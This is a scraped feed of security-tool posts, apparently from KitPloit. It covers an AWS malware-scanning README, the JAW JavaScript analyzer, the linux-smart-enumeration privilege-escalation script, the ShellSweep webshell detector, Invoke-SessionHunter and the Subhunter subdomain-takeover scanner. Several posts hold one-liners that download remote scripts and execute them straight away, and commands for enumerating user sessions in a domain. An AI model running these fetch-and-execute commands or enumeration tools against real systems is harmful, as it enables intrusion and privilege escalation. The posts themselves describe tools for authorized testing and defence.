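    """Submit commands at most one per min_interval seconds (API throttling)."""
    for i, cmd in enumerate(commands):
        if i:
            sleep(min_interval)
        submit(cmd)
```

The sleep parameter is injectable so the pacing behaviour can be exercised without real delays.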

    Usage

    Pre-requisites

    • An AWS Account.
• Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 source server in sync. If not, please check this documentation. The Replication Configuration must use EBS encryption with a Customer Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support the default AWS managed key for EBS.
    • IAM Privileges to deploy the components of this solution.
    • Amazon GuardDuty enabled. If not, please check this documentation
    • Amazon Security Hub enabled. If not, please check this documentation

      Warning
      Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.

    Deploy

1. Create a Cloud9 environment with an Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 ships node v16, which is no longer supported since 2023-09-11.

  git clone https://github.com/aws-samples/drs-malware-scan

      cd drs-malware-scan

      sh check_loggroup.sh

    2. Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment

  npm install
  cdk bootstrap
  cdk deploy --all

  Note: The solution is made of 2 stacks:
  • DrsMalwareScanStack: deploys all the resources needed for the malware scanning feature. This stack is mandatory. If you want to deploy only this stack, run cdk deploy DrsMalwareScanStack
  • ScanReportStack: deploys the resources needed for reporting (AWS Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack, run cdk deploy ScanReportStack

  If you want to deploy both stacks, run cdk deploy --all

    Troubleshooting

All Lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting its CloudWatch log group; look for the /aws/lambda/DrsMalwareScanStack-* pattern.

    The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.

The SQS FIFO queues can be monitored using the Messages available and Messages in flight metrics from the AWS SQS console.

The DRS Volume Annotations DynamoDB table keeps track of the status of each malware scan operation.

    Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan

In order to analyze logs from Amazon GuardDuty malware scan operations, you can check the /aws/guardduty/malware-scan-events Amazon CloudWatch log group. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.

    Cleanup

    1. Run the following commands in your terminal:

      cdk destroy --all

    2. (Optional) Delete the CloudWatch log groups associated with Lambda Functions.

    AWS Cost Estimation Analysis

For the purpose of this analysis, we assume a fictitious example scenario. The following cost estimates are based on services located in the North Virginia (us-east-1) region.

    Estimated scenario:

    • 2 Source Servers to replicate (DR) (Total Storage: 100GB - 4 disks)
    • 3 TB Malware Scanned/Month
    • 30 days of EBS snapshot Retention period
    • Daily Malware scans
Monthly Cost: 171.22 USD
Total Cost for 12 Months: 2,054.74 USD

    Service Breakdown:

Service Name | Description | Monthly Cost (USD)
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56
Amazon DynamoDB | 100MB / 1 Read/Second / 1 Write/Second | 3.65
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Findings Ingested | 0.10
AWS EventBridge | 1M custom events | 1.00
Amazon CloudWatch | 1GB ingested/month | 0.50
AWS Lambda | 5 ARM Lambda Functions / 128MB / 10secs | 0.00
Amazon SQS | 2 SQS FIFO queues | 0.00
Total | | 171.22
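As a quick sanity check, the per-service figures in the breakdown do sum to the stated monthly total:

```python
# Sanity check of the service breakdown above: the per-service monthly
# figures sum to the stated 171.22 USD monthly total.
breakdown = {
    "AWS Elastic Disaster Recovery": 71.41,
    "Amazon GuardDuty": 94.56,
    "Amazon DynamoDB": 3.65,
    "AWS Security Hub": 0.10,
    "AWS EventBridge": 1.00,
    "Amazon CloudWatch": 0.50,
    "AWS Lambda": 0.00,
    "Amazon SQS": 0.00,
}
monthly_total = round(sum(breakdown.values()), 2)
print(monthly_total)  # 171.22
```

Multiplying the rounded monthly total by 12 gives 2,054.64 USD; the 2,054.74 USD yearly figure presumably comes from the AWS calculator's unrounded monthly value.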

Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments, it is advisable to include a Business Support Plan (not considered in this estimation).

    Security

    See CONTRIBUTING for more information.

    Authors



KitPloit - PenTest Tools!

    JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

    By: Zion3R β€” May 19th 2024 at 12:30

    An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

    This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

    JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

    Release Notes:


    Overview of JAW

The architecture of JAW is shown below.

    Test Inputs

    JAW can be used in two distinct ways:

    1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

    2. Web Application Analysis: Analyze a web application by providing a single seed URL.

    Data Collection

    • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

    HPG Construction

    • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

    • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

    Analysis and Outputs

    • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

    • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

    • The outputs will be stored in the same folder as that of input.

    Setup

The installation script relies on the following prerequisites:
• Latest version of the npm package manager (Node.js)
• Any stable version of Python 3.x
• The Python pip package manager

    Afterwards, install the necessary dependencies via:

    $ ./install.sh

    For detailed installation instructions, please see here.

    Quick Start

    Running the Pipeline

    You can run an instance of the pipeline in a background screen via:

    $ python3 -m run_pipeline --conf=config.yaml

    The CLI provides the following options:

    $ python3 -m run_pipeline -h

    usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

    This script runs the tool pipeline.

    optional arguments:
    -h, --help show this help message and exit
    --conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
    --site SITE, -S SITE website to test; overrides config file (default: None)
    --list LIST, -L LIST site list to test; overrides config file (default: None)
    --from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
    --to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

    Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

    Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

    Quick Example

    For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

    $ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

    Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For the most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

    Playwright CLI with Foxhound

    This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

    $ cd crawler
    $ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

    The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

    Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

    Puppeteer CLI

    To start the crawler, do:

    $ cd crawler
    $ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

    See here for more information.

    Selenium CLI

    To start the crawler, do:

    $ cd crawler/hpg_crawler
    $ vim docker-compose.yaml # set the websites you want to crawl here and save
    $ docker-compose build
    $ docker-compose up -d

    Please refer to the documentation of the hpg_crawler here for more information.

    Graph Construction

    HPG Construction CLI

    To generate an HPG for a given (set of) JavaScript file(s), do:

    $ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

    optional arguments:
    --lang: language of the input program
    --graphid: an identifier for the generated HPG
    --input: path of the input program(s)
    --output: path of the output HPG, must be i
    --mode: determines the output format (csv or graphML)

    HPG Import CLI

    To import an HPG inside a neo4j graph database (docker instance), do:

    $ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
    $ python3 -m hpg_neo4j.hpg_import -h

    usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

    This script imports a CSV of a property graph into a neo4j docker database.

    optional arguments:
    -h, --help show this help message and exit
    --rpath P relative path to the folder containing the graph CSV files inside the `data` directory
    --id I an identifier for the graph or docker container
    --nodes N the name of the nodes csv file (default: nodes.csv)
    --edges E the name of the relations csv file (default: rels.csv)

    HPG Construction and Import CLI (v1)

    In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

    $ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

    Specification of Parameters:

    • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
    • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
    • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
• --hybrid=<bool>: whether hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
• --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false to exclude (default: request_logs_short.out).
    • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
    • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
    • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

    For more information, you can use the help CLI provided with the graph construction API:

    $ python3 -m engine.api -h

    Security Analysis

    The constructed HPG can then be queried using Cypher or the NeoModel ORM.

    Running Custom Graph traversals

    You should place and run your queries in analyses/<ANALYSIS_NAME>.

    Option 1: Using the NeoModel ORM (Deprecated)

    You can use the NeoModel ORM to query the HPG. To write a query:

    • (1) Check out the HPG data model and syntax tree.
    • (2) Check out the ORM model for HPGs
    • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
    $ python3 -m analyses.example.example_query_orm  

    For more information, please see here.

    Option 2: Using Cypher Queries

    You can use Cypher to write custom queries. For this:

    • (1) Check out the HPG data model and syntax tree.
    • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
    $ python3 -m analyses.example.example_query_cypher

    For more information, please see here.
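For orientation, a custom Cypher traversal is usually just a parameterized query string handed to the Neo4j driver. The node label and relationship type below are placeholder names, not JAW's actual HPG schema; the shape of the query is what matters:

```python
# Illustrative only: ASTNode and PDG_FLOWS_TO are placeholder names, not
# JAW's actual HPG schema. This shows the shape of a parameterized Cypher
# traversal you would hand to a Neo4j driver session.
def taint_query(source_code="window.location.href", max_hops=5):
    """Build a Cypher query finding call expressions reachable from a source
    node via bounded-length data-flow edges."""
    query = (
        "MATCH (src:ASTNode {code: $source})"
        f"-[:PDG_FLOWS_TO*1..{max_hops}]->"
        "(sink:CallExpression) RETURN sink"
    )
    return query, {"source": source_code}
```

With a real schema, the returned pair would be executed as session.run(query, params) against the imported HPG database.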

    Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering.

    Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
  enabled: true
  # [...]

domclobbering:
  enabled: false
  # [...]

cs_csrf:
  enabled: false
  # [...]

    Step 2. Run an instance of the pipeline with:

    $ python3 -m run_pipeline --conf=config.yaml

    Hint. You can run multiple instances of the pipeline under different screens:

    $ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
    $ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
    $ # [...]

    To generate parallel configuration files automatically, you may use the generate_config.py script.
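The core of such a generator is the index arithmetic: splitting one site list into --from/--to ranges, one per parallel pipeline instance. The sketch below illustrates the idea only; the actual generate_config.py may work differently:

```python
# Hedged sketch (not the actual generate_config.py): split n_sites entries
# into per-worker (from, to) index ranges matching the --from/--to semantics
# of run_pipeline, so each parallel instance covers a disjoint slice.
def partition_ranges(n_sites, n_workers):
    """Return inclusive (from, to) index pairs covering 0..n_sites-1."""
    base, extra = divmod(n_sites, n_workers)
    ranges, start = [], 0
    for w in range(n_workers):
        size = base + (1 if w < extra else 0)  # spread the remainder evenly
        if size == 0:
            continue                           # more workers than sites
        ranges.append((start, start + size - 1))
        start += size
    return ranges
```

Each pair would then be written into its own conf<N>.yaml (or passed as --from/--to overrides) for one screen session.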

    How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point, whereas a request marked with ['NON-REACH'] is not forgeable.

    An example output entry is shown below:

    [*] Tags: ['WIN.LOC']
    [*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
    [*] Location: 29
    [*] Function: ajax
    [*] Template: ajaxloc + "/bearer1234/"
    [*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

    1:['WIN.LOC'] variable=ajaxloc
    0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, and is thus forgeable through ['WIN.LOC'].
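The entry format above is regular enough to post-process automatically. A sketch of a parser for it (the format is inferred from this one example; real sink.flows.out files may contain extra fields):

```python
# Sketch: parse one sink.flows.out entry of the "[*] Key: value" form shown
# above into a dict. Format inferred from the example; may be incomplete.
import ast

def parse_flow_entry(text):
    """Extract the [*]-prefixed fields of one entry into a dict."""
    entry = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[*]") and ":" in line:
            key, _, value = line[3:].partition(":")
            entry[key.strip()] = value.strip()
    if "Tags" in entry:
        # "['WIN.LOC']" -> ["WIN.LOC"], so tags can be filtered on directly
        entry["Tags"] = ast.literal_eval(entry["Tags"])
    return entry
```

A triage script could then, for instance, keep only entries whose Tags include 'WIN.LOC' and drop the 'NON-REACH' ones.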

    Test Web Application

    In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

    First, install the dependencies via:

    $ cd tests/test-webapp
    $ npm install

    Then, run the application in a new screen:

    $ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

    Detailed Documentation.

    For more information, visit our wiki page here. Below is a table of contents for quick access.

    The Web Crawler of JAW

    Data Model of Hybrid Property Graphs (HPGs)

    Graph Construction

    Graph Traversals

    Contribution and Code Of Conduct

Pull requests are always welcome. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

    Academic Publication

    If you use the JAW for academic research, we encourage you to cite the following paper:

    @inproceedings{JAW,
    title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
    author= {Soheil Khodayari and Giancarlo Pellegrino},
    booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
    year = {2021},
    address = {Vancouver, B.C.},
    publisher = {{USENIX} Association},
    }

    Acknowledgements

    JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

    @tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



KitPloit - PenTest Tools!

    Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

    By: Zion3R β€” May 19th 2024 at 00:42


    First, a couple of useful oneliners ;)

    wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
    curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

    Note that since version 2.10 you can serve the script to other hosts with the -S flag!


    linux-smart-enumeration

    Linux enumeration tools for pentesting and CTFs

    This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

    Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

    What is it?

    This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

    From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

    It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.

    It has 3 levels of verbosity so you can control how much information you see.

    In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

    By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

    How to use it?

    The idea is to get the information gradually.

    First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.

    If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

    If that does not help, level 2 will just dump everything it can gather about the system using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.

    You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

    Use: ./lse.sh [options]

    OPTIONS
    -c Disable color
    -i Non interactive mode
    -h This help
    -l LEVEL Output verbosity level
    0: Show highly important results. (default)
    1: Show interesting results.
    2: Show all gathered information.
    -s SELECTION Comma separated list of sections or tests to run. Available
    sections:
    usr: User related tests.
    sud: Sudo related tests.
    fst: File system related tests.
    sys: System related tests.
    sec: Security measures related tests.
    ret: Recurrent tasks (cron, timers) related tests.
    net: Network related tests.
    srv: Services related tests.
    pro: Processes related tests.
    sof: Software related tests.
    ctn: Container (docker, lxc) related tests.
    cve: CVE related tests.
    Specific tests can be used with their IDs (i.e.: usr020,sud)
    -e PATHS Comma separated list of paths to exclude. This allows you
    to do faster scans at the cost of completeness
    -p SECONDS Time that the process monitor will spend watching for
    processes. A value of 0 will disable any watch (default: 60)
    -S Serve the lse.sh script in this host so it can be retrieved
    from a remote host.

    Is it pretty?

    Usage demo

    Also available in webm video


    Level 0 (default) output sample


    Level 1 verbosity output sample


    Level 2 verbosity output sample


    Examples

    Direct execution oneliners

    bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
    bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i



    ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory

    By: Zion3R β€” May 17th 2024 at 12:30

    ShellSweep

    ShellSweeping the evil

    Why ShellSweep

    "ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

    ShellSweep and its suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of the encrypted or obfuscated code often found in webshells.

    β€’ It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells.
    β€’ Certain directories can be excluded from scanning.
    β€’ Files with certain hashes can be ignored during the scan.


    How does ShellSweep find the shells?

    Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

    When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

    If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower.

    In the context of finding webshells or malicious files, entropy can be a useful indicator:

    β€’ Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random.
    β€’ A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.).

    So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

    ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by:

    β€’ Counting how often each character appears in the file.
    β€’ Using these frequencies to calculate the probability of each character.
    β€’ Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.
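The same calculation can be sketched in Python (a minimal, illustrative equivalent of the PowerShell Get-Entropy function, not ShellSweep's actual code):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    # -sum(p * log2(p)) over the frequency of each distinct byte value
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(data).values())
```

A file of one repeated byte scores 0.0, while perfectly uniform random bytes approach 8.0, which is why obfuscated webshells tend to sit near the top of the range.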

    ShellScan

    ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

    Pass ShellScan.ps1 some directories of webshells, any size set. I used:

    • https://github.com/tennc/webshell
    • https://github.com/BlackArch/webshells
    • https://github.com/tarwich/jackal/blob/master/libraries/

    This will give a decent training set to get entropy values.

    Output example:

    Statistics for .aspx files:
    Average entropy: 4.94212121048115
    Minimum entropy: 1.29348709979974
    Maximum entropy: 6.09830238020383
    Median entropy: 4.85437969842084
    Statistics for .asp files:
    Average entropy: 5.51268104400858
    Minimum entropy: 0.732406213077191
    Maximum entropy: 7.69241278153711
    Median entropy: 5.57351177724806

    ShellCSV

    First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

    See ShellCSV.csv as example output.

    ShellSweep

    First, choose your flavor: Python, PowerShell or Lua.

    • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
    • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
    • Modify paths. I don't recommend just scanning all the C:\, lots to filter.
    • Modify any filters needed.
    • Run it!

    If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

    Questions

    Feel free to open a Git issue.

    Thank You

    If you enjoyed this project, be sure to star the project and share with your family and friends.




    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R β€” May 16th 2024 at 12:30


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

    If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which will most likely retrieve more results).

    It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

    This works in combination with -Timeout (default: 2); increase it for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

    Include localhost in the sessions retrieval (localhost is excluded by default)

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

    Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan



    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R β€” May 15th 2024 at 12:30


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns or stealing user cookies. Typically, this happens when the subdomain has a CNAME record in DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
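The core check can be sketched as a fingerprint match against the HTTP response of a dangling subdomain. The fingerprints below are illustrative stand-ins; Subhunter itself uses a fork of the can-i-take-over-xyz fingerprint data:

```python
# Hypothetical, trimmed-down fingerprint table (illustrative values only).
FINGERPRINTS = {
    "GitHub Pages": "There isn't a GitHub Pages site here",
    "Heroku": "No such app",
}

def check_takeover(body: str):
    """Return the provider whose takeover signature appears in the
    response body, or None if no fingerprint matches."""
    for provider, signature in FINGERPRINTS.items():
        if signature in body:
            return provider
    return None
```

A real scanner would first confirm the CNAME points at the provider before trusting the body match, to avoid false positives.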


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothing found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt





    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R β€” May 15th 2024 at 01:56


